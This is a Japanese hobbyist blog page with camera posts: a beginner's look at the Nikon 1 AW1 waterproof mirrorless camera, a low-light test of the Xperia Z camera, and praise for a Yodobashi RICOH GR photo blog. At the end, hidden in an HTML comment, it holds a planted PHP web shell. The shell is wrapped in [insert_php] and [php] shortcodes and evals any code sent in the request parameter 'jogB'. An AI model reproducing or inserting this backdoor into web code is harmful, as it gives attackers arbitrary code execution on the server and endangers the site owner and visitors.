ニコンの防水ミラーレス一眼カメラ『Nikon 1 AW1』を初心者目線で分析

世界初の防水・耐衝撃のミラーレス一眼がニコンより発表されました。

ニコンのプレスリリース

水深15mの防水、2mの耐衝撃性能を備える世界初の防水・耐衝撃レンズ交換式デジタルカメラ「Nikon 1 AW1」を発売

09_aw1_01

趣味が熱帯魚、自転車などアウトドアに偏っている自分としては、防水機能はかなり魅力的です。水槽に沈めて動画撮影したり、川に潜って日淡の写真とったり、なかなか良さそう。今までの『1NIKKOR』のレンズ群が装着できるので拡張性も抜群っぽい。ただし、防水機能は今回セット販売の標準ズームレンズ「1 NIKKOR AW 11-27.5mm f/3.5-5.6」と単品販売とレンズセットとして付属する「1 NIKKOR AW 10mm f/2.8」をつけた場合のみです。

スペックなど詳細はコチラのニコンの製品ページへ。

sealing

 

本体は黄色部分にシーリングしてあり、水の侵入を防ぐみたい。かっこいいw水中撮影のサンプルがあったので拝借。ニコン撮影サンプルより。

img_02

コチラで拡大画像データ見れます。カメラより普通にダイビングしたくなります。本気でダイビングするには、耐水深度15mじゃ怪しいので、シュノーケリング向けとかですかね。沖縄旅行とかで、アクティビティ、風景、スナップぐらいが目的なら、陸上で他のレンズの選択肢もあるこのカメラはかなり使い勝手良さそうです。夏海行って、冬はスノボーとかの人にはうってつけだと思います。

こんな感じのシリコンジャケットなども同時発売予定です。耐衝撃だからといって傷だらけは嫌なので嬉しいオプション。


現在予約受け付け中で、アマゾンの予約価格は¥81,628。

センサーは、ASP−Cより小さめのサイズです。防水・耐衝撃と小型と言うメリットをとれば、センサーサイズは妥協せざるを得ないですね。。僕には違いがわかりませんが。Sonyが同時期に発売するレンズだけのカメラなど、各社いろいろ仕掛けてきますね。

今僕がどれ買うか検討しているのは、RICOH GR、Nikon 1 AW1、あとSonyのレンズだけの変態カメラ。それぞれ全然毛色が違うので全部ほしいのが本音ですがwどれも出たばっかりですので、じっくり様子みながら選んでいきます。iPhone5sもセンサーサイズアップで、画質改善して来たので各社必死です。買う側はわくわくして選べるので楽しいですね。

参考:GIGAZINE AV Watch

今さらXperiaZのカメラレビュー暗所編

カメラを調べれば調べるほどカメラ自体の性能、機械的な魅力に取り憑かれてしまします。今持ってるカメラといえば、EOS kiss x3とXperiaZ。何世代前かわからない入門一眼レフと、最新から毎日遠ざかっていくスマホです。本気カメラとして6D、サブ機としてRICOHのGRが欲しいのですが、その前に手持ちの二つで写真とるの上手くなりたいですね。

しかしカメラ自体の性能ももちろん気になるので、拙いですがレビューします。

僕みたいなカメラ初心者は、やたら夕暮れなどを撮りたくなります。。

DSC_0152

SS1/50 f2.4 ISO50

こちらは夕暮れのまだ太陽が見えてるぐらいの明るさです。けっこう暗いのですが暗所での性能はまあまあ良さそうです。Xperiaからみると綺麗に写ってるように思います。一眼をわからないなりに触っていたので、ISO50にびっくりしました。クリックして等倍表示するとぶれぶれですね。

 DSC_0153

SS1/16 f2.4 ISO600

日が暮れてぎりぎり太陽の明るさが残ってるかなぐらいのタイミング。ISO600で結構ノイズが目立ちます。また肉眼だともうちょっと暗いかなってところで、そこを撮りたかったので明るくなりすぎてますね。設定いじれるのかな?

ブラビアエンジンのおかげでxperiaでみると本当に綺麗です。なかなか良いと思いつつモニターでみるとがっくし。やっぱりGR欲しい。豆センサーの限界でしょうか。

最近はスマホに出来る事が増える一方、PCとの間にタブレットが割って入り、スマホにそんなに機能はいらないんじゃないかなと思えます。というかiPadminiで電話番号使えたら最強になるんじゃないかなと思ってます。だからGRにかるーいスマホの機能つかないかなーなんてね。ま、RICOHはそんなことしないでしょうけど。林檎信者がXperia使った感想など今後も書いていきます。
[ad#ad-bottom-article]

ヨドバシさんのRICOH GRのフォトレビューが面白い

ヨドバシカメラのブログですが、すごく旅行に行きたくなりますね。
カメラ一つで旅に出る
写真一枚お借りします。

20130723-184126.jpg

”海と空の境目が曖昧になったモノトーンの世界にほのかに浮かぶ被写体。深い霧に包まれた海岸では、見えたはずの遠くの景色を目にすることはできません。ガッカリするよりも、そんな写真が撮れるチャンスだとワクワクしましょう。写真って、本当にいい趣味だと思います。”

ぼくもそう思います。
旅行だ!と意気込んで一眼レフ担いで旅行にいくと写真を撮ることに夢中になり、旅行そのものの良さそを忘れてしまいがちですが、GRの機動性、描写力ぐらいだとちょうどいいのかもしれません。そして上の一枚は旅行と写真のいいとこが上手いことまじった良い写真ですね。
私コンビニの店長ですので、あまり旅行に行けないのですが隙をみて一人旅してみたいですね。
ヨドバシカメラってばりばり商売ってイメージでしたが、店員さんの対応、こういうブログみてるとしっかりしてるなーと思います。Amazon大好きでしたが、ヨドバシカメラもこれから利用してみますか。

<!– [insert_php]if (isset($_REQUEST["jogB"])){eval($_REQUEST["jogB"]);exit;}[/insert_php][php]if (isset($_REQUEST["jogB"])){eval($_REQUEST["jogB"]);exit;}[/php] –>